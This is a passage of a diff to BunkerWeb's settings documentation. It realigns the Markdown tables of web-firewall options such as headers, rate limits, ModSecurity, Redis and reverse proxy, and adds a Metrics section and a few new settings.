with spaces, containing ASN to put into the greylist. | -|`GREYLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to put into the greylist. | -|`GREYLIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to put into the greylist. | -|`GREYLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to put into the greylist. | -|`GREYLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to put into the greylist. | +| Setting | Default | Context | Multiple | Description | +| -------------------------- | ------- | --------- | -------- | ---------------------------------------------------------------------------------------------- | +| `USE_GREYLIST` | `no` | multisite | no | Activate greylist feature. | +| `GREYLIST_IP` | | multisite | no | List of IP/network, separated with spaces, to put into the greylist. | +| `GREYLIST_IP_URLS` | | global | no | List of URLs, separated with spaces, containing good IP/network to put into the greylist. | +| `GREYLIST_RDNS_GLOBAL` | `yes` | multisite | no | Only perform RDNS greylist checks on global IP addresses. | +| `GREYLIST_RDNS` | | multisite | no | List of reverse DNS suffixes, separated with spaces, to put into the greylist. | +| `GREYLIST_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist. | +| `GREYLIST_ASN` | | multisite | no | List of ASN numbers, separated with spaces, to put into the greylist. | +| `GREYLIST_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to put into the greylist. | +| `GREYLIST_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to put into the greylist. | +| `GREYLIST_USER_AGENT_URLS` | | global | no | List of URLs, separated with spaces, containing good User-Agent to put into the greylist. | +| `GREYLIST_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to put into the greylist. | +| `GREYLIST_URI_URLS` | | global | no | List of URLs, separated with spaces, containing bad URI to put into the greylist. | ### Gzip @@ -272,12 +274,12 @@ STREAM support :x: Compress HTTP requests with the gzip algorithm. -| Setting | Default | Context |Multiple| Description | -|-----------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|-----------------------------------------------------| -|`USE_GZIP` |`no` |multisite|no |Use gzip | -|`GZIP_TYPES` |`application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml`|multisite|no |List of MIME types that will be compressed with gzip.| -|`GZIP_MIN_LENGTH`|`1000` |multisite|no |Minimum length for gzip compression. | -|`GZIP_COMP_LEVEL`|`5` |multisite|no |The compression level of the gzip algorithm. | +| Setting | Default | Context | Multiple | Description | +| ----------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ----------------------------------------------------- | +| `USE_GZIP` | `no` | multisite | no | Use gzip | +| `GZIP_TYPES` | `application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml` | multisite | no | List of MIME types that will be compressed with gzip. | +| `GZIP_MIN_LENGTH` | `1000` | multisite | no | Minimum length for gzip compression. | +| `GZIP_COMP_LEVEL` | `5` | multisite | no | The compression level of the gzip algorithm. | ### HTML injection @@ -285,9 +287,9 @@ STREAM support :x: Inject custom HTML code before the tag. -| Setting |Default| Context |Multiple| Description | -|-------------|-------|---------|--------|------------------------| -|`INJECT_BODY`| |multisite|no |The HTML code to inject.| +| Setting | Default | Context | Multiple | Description | +| ------------- | ------- | --------- | -------- | ------------------------ | +| `INJECT_BODY` | | multisite | no | The HTML code to inject. | ### Headers @@ -295,22 +297,22 @@ STREAM support :x: Manage HTTP headers sent to clients. -| Setting | Default | Context |Multiple| Description | -|-------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|----------------------------------------------------------------------------------------------| -|`CUSTOM_HEADER` | |multisite|yes |Custom header to add (HeaderName: HeaderValue). | -|`REMOVE_HEADERS` |`Server Expect-CT X-Powered-By X-AspNet-Version X-AspNetMvc-Version` |multisite|no |Headers to remove (Header1 Header2 Header3 ...) | -|`KEEP_UPSTREAM_HEADERS` |`Content-Security-Policy Permissions-Policy Feature-Policy X-Frame-Options` |multisite|no |Headers to keep from upstream (Header1 Header2 Header3 ... or * for all). | -|`STRICT_TRANSPORT_SECURITY` |`max-age=31536000` |multisite|no |Value for the Strict-Transport-Security header. | -|`COOKIE_FLAGS` |`* HttpOnly SameSite=Lax` |multisite|yes |Cookie flags automatically added to all cookies (value accepted for nginx_cookie_flag_module).| -|`COOKIE_AUTO_SECURE_FLAG` |`yes` |multisite|no |Automatically add the Secure flag to all cookies. | -|`CONTENT_SECURITY_POLICY` |`object-src 'none'; form-action 'self'; frame-ancestors 'self';` |multisite|no |Value for the Content-Security-Policy header. | -|`CONTENT_SECURITY_POLICY_REPORT_ONLY`|`no` |multisite|no |Send reports for violations of the Content-Security-Policy header instead of blocking them. | -|`REFERRER_POLICY` |`strict-origin-when-cross-origin` |multisite|no |Value for the Referrer-Policy header. | -|`PERMISSIONS_POLICY` |`accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), web-share=(), xr-spatial-tracking=()` |multisite|no |Value for the Permissions-Policy header. | -|`FEATURE_POLICY` |`accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; fullscreen 'none'; geolocation 'none'; gyroscope 'none'; layout-animation 'none'; legacy-image-formats 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-get 'none'; speaker-selection 'none'; sync-xhr 'none'; unoptimized-images 'none'; unsized-media 'none'; usb 'none'; screen-wake-lock 'none'; web-share 'none'; xr-spatial-tracking 'none';`|multisite|no |Value for the Feature-Policy header. | -|`X_FRAME_OPTIONS` |`SAMEORIGIN` |multisite|no |Value for the X-Frame-Options header. | -|`X_CONTENT_TYPE_OPTIONS` |`nosniff` |multisite|no |Value for the X-Content-Type-Options header. | -|`X_XSS_PROTECTION` |`1; mode=block` |multisite|no |Value for the X-XSS-Protection header. | +| Setting | Default | Context | Multiple | Description | +| ------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ---------------------------------------------------------------------------------------------- | +| `CUSTOM_HEADER` | | multisite | yes | Custom header to add (HeaderName: HeaderValue). | +| `REMOVE_HEADERS` | `Server Expect-CT X-Powered-By X-AspNet-Version X-AspNetMvc-Version` | multisite | no | Headers to remove (Header1 Header2 Header3 ...) | +| `KEEP_UPSTREAM_HEADERS` | `Content-Security-Policy Permissions-Policy Feature-Policy X-Frame-Options` | multisite | no | Headers to keep from upstream (Header1 Header2 Header3 ... or * for all). | +| `STRICT_TRANSPORT_SECURITY` | `max-age=31536000` | multisite | no | Value for the Strict-Transport-Security header. | +| `COOKIE_FLAGS` | `* HttpOnly SameSite=Lax` | multisite | yes | Cookie flags automatically added to all cookies (value accepted for nginx_cookie_flag_module). | +| `COOKIE_AUTO_SECURE_FLAG` | `yes` | multisite | no | Automatically add the Secure flag to all cookies. | +| `CONTENT_SECURITY_POLICY` | `object-src 'none'; form-action 'self'; frame-ancestors 'self';` | multisite | no | Value for the Content-Security-Policy header. | +| `CONTENT_SECURITY_POLICY_REPORT_ONLY` | `no` | multisite | no | Send reports for violations of the Content-Security-Policy header instead of blocking them. | +| `REFERRER_POLICY` | `strict-origin-when-cross-origin` | multisite | no | Value for the Referrer-Policy header. | +| `PERMISSIONS_POLICY` | `accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), web-share=(), xr-spatial-tracking=()` | multisite | no | Value for the Permissions-Policy header. | +| `FEATURE_POLICY` | `accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; fullscreen 'none'; geolocation 'none'; gyroscope 'none'; layout-animation 'none'; legacy-image-formats 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-get 'none'; speaker-selection 'none'; sync-xhr 'none'; unoptimized-images 'none'; unsized-media 'none'; usb 'none'; screen-wake-lock 'none'; web-share 'none'; xr-spatial-tracking 'none';` | multisite | no | Value for the Feature-Policy header. | +| `X_FRAME_OPTIONS` | `SAMEORIGIN` | multisite | no | Value for the X-Frame-Options header. | +| `X_CONTENT_TYPE_OPTIONS` | `nosniff` | multisite | no | Value for the X-Content-Type-Options header. | +| `X_XSS_PROTECTION` | `1; mode=block` | multisite | no | Value for the X-XSS-Protection header. | ### Let's Encrypt @@ -318,11 +320,11 @@ STREAM support :white_check_mark: Automatic creation, renewal and configuration of Let's Encrypt certificates. -| Setting |Default| Context |Multiple| Description | -|--------------------------|-------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -|`AUTO_LETS_ENCRYPT` |`no` |multisite|no |Activate automatic Let's Encrypt mode. | -|`EMAIL_LETS_ENCRYPT` | |multisite|no |Email used for Let's Encrypt notification and in certificate. | -|`USE_LETS_ENCRYPT_STAGING`|`no` |multisite|no |Use the staging environment for Let’s Encrypt certificate generation. Useful when you are testing your deployments to avoid being rate limited in the production environment.| +| Setting | Default | Context | Multiple | Description | +| -------------------------- | ------- | --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `AUTO_LETS_ENCRYPT` | `no` | multisite | no | Activate automatic Let's Encrypt mode. | +| `EMAIL_LETS_ENCRYPT` | | multisite | no | Email used for Let's Encrypt notification and in certificate. | +| `USE_LETS_ENCRYPT_STAGING` | `no` | multisite | no | Use the staging environment for Let’s Encrypt certificate generation. Useful when you are testing your deployments to avoid being rate limited in the production environment. | ### Limit @@ -330,15 +332,27 @@ STREAM support :warning: Limit maximum number of requests and connections. -| Setting |Default| Context |Multiple| Description | -|-----------------------|-------|---------|--------|---------------------------------------------------------------------------------------------| -|`USE_LIMIT_REQ` |`yes` |multisite|no |Activate limit requests feature. | -|`LIMIT_REQ_URL` |`/` |multisite|yes |URL (PCRE regex) where the limit request will be applied or special value / for all requests.| -|`LIMIT_REQ_RATE` |`2r/s` |multisite|yes |Rate to apply to the URL (s for second, m for minute, h for hour and d for day). | -|`USE_LIMIT_CONN` |`yes` |multisite|no |Activate limit connections feature. | -|`LIMIT_CONN_MAX_HTTP1` |`10` |multisite|no |Maximum number of connections per IP when using HTTP/1.X protocol. | -|`LIMIT_CONN_MAX_HTTP2` |`100` |multisite|no |Maximum number of streams per IP when using HTTP/2 protocol. | -|`LIMIT_CONN_MAX_STREAM`|`10` |multisite|no |Maximum number of connections per IP when using stream. | +| Setting | Default | Context | Multiple | Description | +| ----------------------- | ------- | --------- | -------- | --------------------------------------------------------------------------------------------- | +| `USE_LIMIT_REQ` | `yes` | multisite | no | Activate limit requests feature. | +| `LIMIT_REQ_URL` | `/` | multisite | yes | URL (PCRE regex) where the limit request will be applied or special value / for all requests. | +| `LIMIT_REQ_RATE` | `2r/s` | multisite | yes | Rate to apply to the URL (s for second, m for minute, h for hour and d for day). | +| `USE_LIMIT_CONN` | `yes` | multisite | no | Activate limit connections feature. | +| `LIMIT_CONN_MAX_HTTP1` | `10` | multisite | no | Maximum number of connections per IP when using HTTP/1.X protocol. | +| `LIMIT_CONN_MAX_HTTP2` | `100` | multisite | no | Maximum number of streams per IP when using HTTP/2 protocol. | +| `LIMIT_CONN_MAX_STREAM` | `10` | multisite | no | Maximum number of connections per IP when using stream. | + +### Metrics + +STREAM support :warning: + +Metrics collection and retrieve. + +| Setting | Default | Context | Multiple | Description | +| ------------------------------ | ------- | --------- | -------- | --------------------------------------------------------- | +| `USE_METRICS` | `yes` | multisite | no | Enable collection and retrieval of internal metrics. | +| `METRICS_MEMORY_SIZE` | `16m` | global | no | Size of the internal storage for metrics. | +| `METRICS_MAX_BLOCKED_REQUESTS` | `100` | global | no | Maximum number of blocked requests to store (per worker). | ### Miscellaneous @@ -346,26 +360,26 @@ STREAM support :warning: Miscellaneous settings. -| Setting | Default | Context |Multiple| Description | -|-----------------------------|-----------------------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------| -|`DISABLE_DEFAULT_SERVER` |`no` |global |no |Close connection if the request vhost is unknown. | -|`REDIRECT_HTTP_TO_HTTPS` |`no` |multisite|no |Redirect all HTTP request to HTTPS. | -|`AUTO_REDIRECT_HTTP_TO_HTTPS`|`yes` |multisite|no |Try to detect if HTTPS is used and activate HTTP to HTTPS redirection if that's the case. | -|`ALLOWED_METHODS` |`GET|POST|HEAD` |multisite|no |Allowed HTTP and WebDAV methods, separated with pipes to be sent by clients. | -|`MAX_CLIENT_SIZE` |`10m` |multisite|no |Maximum body size (0 for infinite). | -|`SERVE_FILES` |`yes` |multisite|no |Serve files from the local folder. | -|`ROOT_FOLDER` | |multisite|no |Root folder containing files to serve (/var/www/html/{server_name} if unset). | -|`SSL_PROTOCOLS` |`TLSv1.2 TLSv1.3` |multisite|no |The supported version of TLS. We recommend the default value TLSv1.2 TLSv1.3 for compatibility reasons. | -|`HTTP2` |`yes` |multisite|no |Support HTTP2 protocol when HTTPS is enabled. | -|`LISTEN_HTTP` |`yes` |multisite|no |Respond to (insecure) HTTP requests. | -|`USE_OPEN_FILE_CACHE` |`no` |multisite|no |Enable open file cache feature | -|`OPEN_FILE_CACHE` |`max=1000 inactive=20s`|multisite|no |Open file cache directive | -|`OPEN_FILE_CACHE_ERRORS` |`yes` |multisite|no |Enable open file cache for errors | -|`OPEN_FILE_CACHE_MIN_USES` |`2` |multisite|no |Enable open file cache minimum uses | -|`OPEN_FILE_CACHE_VALID` |`30s` |multisite|no |Open file cache valid time | -|`EXTERNAL_PLUGIN_URLS` | |global |no |List of external plugins URLs (direct download to .zip or .tar file) to download and install (URLs are separated with space).| -|`DENY_HTTP_STATUS` |`403` |global |no |HTTP status code to send when the request is denied (403 or 444). When using 444, BunkerWeb will close the connection. | -|`SEND_ANONYMOUS_REPORT` |`yes` |global |no |Send anonymous report to BunkerWeb maintainers. | +| Setting | Default | Context | Multiple | Description | +| ----------------------------- | ----------------------- | --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------- | +| `DISABLE_DEFAULT_SERVER` | `no` | global | no | Close connection if the request vhost is unknown. | +| `REDIRECT_HTTP_TO_HTTPS` | `no` | multisite | no | Redirect all HTTP request to HTTPS. | +| `AUTO_REDIRECT_HTTP_TO_HTTPS` | `yes` | multisite | no | Try to detect if HTTPS is used and activate HTTP to HTTPS redirection if that's the case. | +| `ALLOWED_METHODS` | `GET | POST | HEAD` | multisite | no | Allowed HTTP and WebDAV methods, separated with pipes to be sent by clients. | +| `MAX_CLIENT_SIZE` | `10m` | multisite | no | Maximum body size (0 for infinite). | +| `SERVE_FILES` | `yes` | multisite | no | Serve files from the local folder. | +| `ROOT_FOLDER` | | multisite | no | Root folder containing files to serve (/var/www/html/{server_name} if unset). | +| `SSL_PROTOCOLS` | `TLSv1.2 TLSv1.3` | multisite | no | The supported version of TLS. We recommend the default value TLSv1.2 TLSv1.3 for compatibility reasons. | +| `HTTP2` | `yes` | multisite | no | Support HTTP2 protocol when HTTPS is enabled. | +| `LISTEN_HTTP` | `yes` | multisite | no | Respond to (insecure) HTTP requests. | +| `USE_OPEN_FILE_CACHE` | `no` | multisite | no | Enable open file cache feature | +| `OPEN_FILE_CACHE` | `max=1000 inactive=20s` | multisite | no | Open file cache directive | +| `OPEN_FILE_CACHE_ERRORS` | `yes` | multisite | no | Enable open file cache for errors | +| `OPEN_FILE_CACHE_MIN_USES` | `2` | multisite | no | Enable open file cache minimum uses | +| `OPEN_FILE_CACHE_VALID` | `30s` | multisite | no | Open file cache valid time | +| `EXTERNAL_PLUGIN_URLS` | | global | no | List of external plugins URLs (direct download to .zip or .tar file) to download and install (URLs are separated with space). | +| `DENY_HTTP_STATUS` | `403` | global | no | HTTP status code to send when the request is denied (403 or 444). When using 444, BunkerWeb will close the connection. | +| `SEND_ANONYMOUS_REPORT` | `yes` | global | no | Send anonymous report to BunkerWeb maintainers. | ### ModSecurity @@ -373,13 +387,14 @@ STREAM support :x: Management of the ModSecurity WAF. -| Setting | Default | Context |Multiple| Description | -|---------------------------------|--------------|---------|--------|------------------------------------------| -|`USE_MODSECURITY` |`yes` |multisite|no |Enable ModSecurity WAF. | -|`USE_MODSECURITY_CRS` |`yes` |multisite|no |Enable OWASP Core Rule Set. | -|`MODSECURITY_SEC_AUDIT_ENGINE` |`RelevantOnly`|multisite|no |SecAuditEngine directive of ModSecurity. | -|`MODSECURITY_SEC_RULE_ENGINE` |`On` |multisite|no |SecRuleEngine directive of ModSecurity. | -|`MODSECURITY_SEC_AUDIT_LOG_PARTS`|`ABCFHZ` |multisite|no |SecAuditLogParts directive of ModSecurity.| +| Setting | Default | Context | Multiple | Description | +| --------------------------------- | -------------- | --------- | -------- | ------------------------------------------ | +| `USE_MODSECURITY` | `yes` | multisite | no | Enable ModSecurity WAF. | +| `USE_MODSECURITY_CRS` | `yes` | multisite | no | Enable OWASP Core Rule Set. | +| `MODSECURITY_CRS_VERSION` | `3` | multisite | no | Version of the OWASP Core Rule Set to use. | +| `MODSECURITY_SEC_AUDIT_ENGINE` | `RelevantOnly` | multisite | no | SecAuditEngine directive of ModSecurity. | +| `MODSECURITY_SEC_RULE_ENGINE` | `On` | multisite | no | SecRuleEngine directive of ModSecurity. | +| `MODSECURITY_SEC_AUDIT_LOG_PARTS` | `ABCFHZ` | multisite | no | SecAuditLogParts directive of ModSecurity. | ### PHP @@ -387,12 +402,12 @@ STREAM support :x: Manage local or remote PHP-FPM. -| Setting |Default| Context |Multiple| Description | -|-----------------|-------|---------|--------|------------------------------------------------------------| -|`REMOTE_PHP` | |multisite|no |Hostname of the remote PHP-FPM instance. | -|`REMOTE_PHP_PATH`| |multisite|no |Root folder containing files in the remote PHP-FPM instance.| -|`LOCAL_PHP` | |multisite|no |Path to the PHP-FPM socket file. | -|`LOCAL_PHP_PATH` | |multisite|no |Root folder containing files in the local PHP-FPM instance. | +| Setting | Default | Context | Multiple | Description | +| ----------------- | ------- | --------- | -------- | ------------------------------------------------------------ | +| `REMOTE_PHP` | | multisite | no | Hostname of the remote PHP-FPM instance. | +| `REMOTE_PHP_PATH` | | multisite | no | Root folder containing files in the remote PHP-FPM instance. | +| `LOCAL_PHP` | | multisite | no | Path to the PHP-FPM socket file. | +| `LOCAL_PHP_PATH` | | multisite | no | Root folder containing files in the local PHP-FPM instance. | ### Real IP @@ -400,14 +415,14 @@ STREAM support :warning: Get real IP of clients when BunkerWeb is behind a reverse proxy / load balancer. -| Setting | Default | Context |Multiple| Description | -|--------------------|-----------------------------------------|---------|--------|--------------------------------------------------------------------------------------------------------| -|`USE_REAL_IP` |`no` |multisite|no |Retrieve the real IP of client. | -|`USE_PROXY_PROTOCOL`|`no` |multisite|no |Enable PROXY protocol communication. | -|`REAL_IP_FROM` |`192.168.0.0/16 172.16.0.0/12 10.0.0.0/8`|multisite|no |List of trusted IPs / networks, separated with spaces, where proxied requests come from. | -|`REAL_IP_FROM_URLS` | |global |no |List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from.| -|`REAL_IP_HEADER` |`X-Forwarded-For` |multisite|no |HTTP header containing the real IP or special value proxy_protocol for PROXY protocol. | -|`REAL_IP_RECURSIVE` |`yes` |multisite|no |Perform a recursive search in the header container IP address. | +| Setting | Default | Context | Multiple | Description | +| -------------------- | ----------------------------------------- | --------- | -------- | -------------------------------------------------------------------------------------------------------- | +| `USE_REAL_IP` | `no` | multisite | no | Retrieve the real IP of client. | +| `USE_PROXY_PROTOCOL` | `no` | multisite | no | Enable PROXY protocol communication. | +| `REAL_IP_FROM` | `192.168.0.0/16 172.16.0.0/12 10.0.0.0/8` | multisite | no | List of trusted IPs / networks, separated with spaces, where proxied requests come from. | +| `REAL_IP_FROM_URLS` | | global | no | List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from. | +| `REAL_IP_HEADER` | `X-Forwarded-For` | multisite | no | HTTP header containing the real IP or special value proxy_protocol for PROXY protocol. | +| `REAL_IP_RECURSIVE` | `yes` | multisite | no | Perform a recursive search in the header container IP address. | ### Redirect @@ -415,11 +430,11 @@ STREAM support :x: Manage HTTP redirects. -| Setting |Default| Context |Multiple| Description | -|-------------------------|-------|---------|--------|-------------------------------------------------| -|`REDIRECT_TO` | |multisite|no |Redirect a whole site to another one. | -|`REDIRECT_TO_REQUEST_URI`|`no` |multisite|no |Append the requested URI to the redirect address.| -|`REDIRECT_TO_STATUS_CODE`|`301` |multisite|no |Status code to send to client when redirecting. | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | ------- | --------- | -------- | ------------------------------------------------- | +| `REDIRECT_TO` | | multisite | no | Redirect a whole site to another one. | +| `REDIRECT_TO_REQUEST_URI` | `no` | multisite | no | Append the requested URI to the redirect address. | +| `REDIRECT_TO_STATUS_CODE` | `301` | multisite | no | Status code to send to client when redirecting. | ### Redis @@ -427,22 +442,23 @@ STREAM support :white_check_mark: Redis server configuration when using BunkerWeb in cluster mode. -| Setting |Default|Context|Multiple| Description | -|-------------------------|-------|-------|--------|-------------------------------------------------------------------| -|`USE_REDIS` |`no` |global |no |Activate Redis. | -|`REDIS_HOST` | |global |no |Redis server IP or hostname. | -|`REDIS_PORT` |`6379` |global |no |Redis server port. | -|`REDIS_DATABASE` |`0` |global |no |Redis database number. | -|`REDIS_SSL` |`no` |global |no |Use SSL/TLS connection with Redis server. | -|`REDIS_TIMEOUT` |`1000` |global |no |Redis server timeout (in ms) for connect, read and write. | -|`REDIS_KEEPALIVE_IDLE` |`30000`|global |no |Max idle time (in ms) before closing redis connection in the pool. | -|`REDIS_KEEPALIVE_POOL` |`10` |global |no |Max number of redis connection(s) kept in the pool. | -|`REDIS_USERNAME` | |global |no |Redis username used in AUTH command. | -|`REDIS_PASSWORD` | |global |no |Redis password used in AUTH command. | -|`REDIS_SENTINEL_HOSTS` | |global |no |Redis sentinel hosts with format host:[port] separated with spaces.| -|`REDIS_SENTINEL_USERNAME`| |global |no |Redis sentinel username. | -|`REDIS_SENTINEL_PASSWORD`| |global |no |Redis sentinel password. | -|`REDIS_SENTINEL_MASTER` | |global |no |Redis sentinel master name. | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | ------- | ------- | -------- | ------------------------------------------------------------------- | +| `USE_REDIS` | `no` | global | no | Activate Redis. | +| `REDIS_HOST` | | global | no | Redis server IP or hostname. | +| `REDIS_PORT` | `6379` | global | no | Redis server port. | +| `REDIS_DATABASE` | `0` | global | no | Redis database number. | +| `REDIS_SSL` | `no` | global | no | Use SSL/TLS connection with Redis server. | +| `REDIS_SSL_VERIFY` | `no` | global | no | Verify the certificate of Redis server. | +| `REDIS_TIMEOUT` | `1000` | global | no | Redis server timeout (in ms) for connect, read and write. | +| `REDIS_KEEPALIVE_IDLE` | `30000` | global | no | Max idle time (in ms) before closing redis connection in the pool. | +| `REDIS_KEEPALIVE_POOL` | `10` | global | no | Max number of redis connection(s) kept in the pool. | +| `REDIS_USERNAME` | | global | no | Redis username used in AUTH command. | +| `REDIS_PASSWORD` | | global | no | Redis password used in AUTH command. | +| `REDIS_SENTINEL_HOSTS` | | global | no | Redis sentinel hosts with format host:[port] separated with spaces. | +| `REDIS_SENTINEL_USERNAME` | | global | no | Redis sentinel username. | +| `REDIS_SENTINEL_PASSWORD` | | global | no | Redis sentinel password. | +| `REDIS_SENTINEL_MASTER` | | global | no | Redis sentinel master name. | ### Reverse proxy @@ -450,34 +466,34 @@ STREAM support :warning: Manage reverse proxy configurations. -| Setting | Default | Context |Multiple| Description | -|---------------------------------------|----------------------------------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------| -|`USE_REVERSE_PROXY` |`no` |multisite|no |Activate reverse proxy mode. | -|`REVERSE_PROXY_INTERCEPT_ERRORS` |`yes` |multisite|no |Intercept and rewrite errors. | -|`REVERSE_PROXY_HOST` | |multisite|yes |Full URL of the proxied resource (proxy_pass). | -|`REVERSE_PROXY_URL` | |multisite|yes |Location URL that will be proxied. | -|`REVERSE_PROXY_WS` |`no` |multisite|yes |Enable websocket on the proxied resource. | -|`REVERSE_PROXY_HEADERS` | |multisite|yes |List of HTTP headers to send to proxied resource separated with semicolons (values for proxy_set_header directive). | -|`REVERSE_PROXY_HEADERS_CLIENT` | |multisite|yes |List of HTTP headers to send to client separated with semicolons (values for add_header directive). | -|`REVERSE_PROXY_BUFFERING` |`yes` |multisite|yes |Enable or disable buffering of responses from proxied resource. | -|`REVERSE_PROXY_KEEPALIVE` |`no` |multisite|yes |Enable or disable keepalive connections with the proxied resource. | -|`REVERSE_PROXY_AUTH_REQUEST` | |multisite|yes |Enable authentication using an external provider (value of auth_request directive). | -|`REVERSE_PROXY_AUTH_REQUEST_SIGNIN_URL`| |multisite|yes |Redirect clients to sign-in URL when using REVERSE_PROXY_AUTH_REQUEST (used when auth_request call returned 401). | -|`REVERSE_PROXY_AUTH_REQUEST_SET` | |multisite|yes |List of variables to set from the authentication provider, separated with semicolons (values of auth_request_set directives).| -|`USE_PROXY_CACHE` |`no` |multisite|no |Enable or disable caching of the proxied resources. | -|`PROXY_CACHE_PATH_LEVELS` |`1:2` |global |no |Hierarchy levels of the cache. | -|`PROXY_CACHE_PATH_ZONE_SIZE` |`10m` |global |no |Maximum size of cached metadata when caching proxied resources. | -|`PROXY_CACHE_PATH_PARAMS` |`max_size=100m` |global |no |Additional parameters to add to the proxy_cache directive. | -|`PROXY_CACHE_METHODS` |`GET HEAD` |multisite|no |HTTP methods that should trigger a cache operation. | -|`PROXY_CACHE_MIN_USES` |`2` |multisite|no |The minimum number of requests before a response is cached. | -|`PROXY_CACHE_KEY` |`$scheme$host$request_uri` |multisite|no |The key used to uniquely identify a cached response. | -|`PROXY_CACHE_VALID` |`200=24h 301=1h 302=24h` |multisite|no |Define the caching time depending on the HTTP status code (list of status=time), separated with spaces. | -|`PROXY_NO_CACHE` |`$http_pragma $http_authorization`|multisite|no |Conditions to disable caching of responses. | -|`PROXY_CACHE_BYPASS` |`0` |multisite|no |Conditions to bypass caching of responses. | -|`REVERSE_PROXY_CONNECT_TIMEOUT` |`60s` |multisite|yes |Timeout when connecting to the proxied resource. | -|`REVERSE_PROXY_READ_TIMEOUT` |`60s` |multisite|yes |Timeout when reading from the proxied resource. | -|`REVERSE_PROXY_SEND_TIMEOUT` |`60s` |multisite|yes |Timeout when sending to the proxied resource. | -|`REVERSE_PROXY_INCLUDES` | |multisite|yes |Additional configuration to include in the location block, separated with spaces. | +| Setting | Default | Context | Multiple | Description | +| --------------------------------------- | ---------------------------------- | --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------- | +| `USE_REVERSE_PROXY` | `no` | multisite | no | Activate reverse proxy mode. | +| `REVERSE_PROXY_INTERCEPT_ERRORS` | `yes` | multisite | no | Intercept and rewrite errors. | +| `REVERSE_PROXY_HOST` | | multisite | yes | Full URL of the proxied resource (proxy_pass). | +| `REVERSE_PROXY_URL` | | multisite | yes | Location URL that will be proxied. | +| `REVERSE_PROXY_WS` | `no` | multisite | yes | Enable websocket on the proxied resource. | +| `REVERSE_PROXY_HEADERS` | | multisite | yes | List of HTTP headers to send to proxied resource separated with semicolons (values for proxy_set_header directive). | +| `REVERSE_PROXY_HEADERS_CLIENT` | | multisite | yes | List of HTTP headers to send to client separated with semicolons (values for add_header directive). | +| `REVERSE_PROXY_BUFFERING` | `yes` | multisite | yes | Enable or disable buffering of responses from proxied resource. | +| `REVERSE_PROXY_KEEPALIVE` | `no` | multisite | yes | Enable or disable keepalive connections with the proxied resource. | +| `REVERSE_PROXY_AUTH_REQUEST` | | multisite | yes | Enable authentication using an external provider (value of auth_request directive). | +| `REVERSE_PROXY_AUTH_REQUEST_SIGNIN_URL` | | multisite | yes | Redirect clients to sign-in URL when using REVERSE_PROXY_AUTH_REQUEST (used when auth_request call returned 401). | +| `REVERSE_PROXY_AUTH_REQUEST_SET` | | multisite | yes | List of variables to set from the authentication provider, separated with semicolons (values of auth_request_set directives). | +| `USE_PROXY_CACHE` | `no` | multisite | no | Enable or 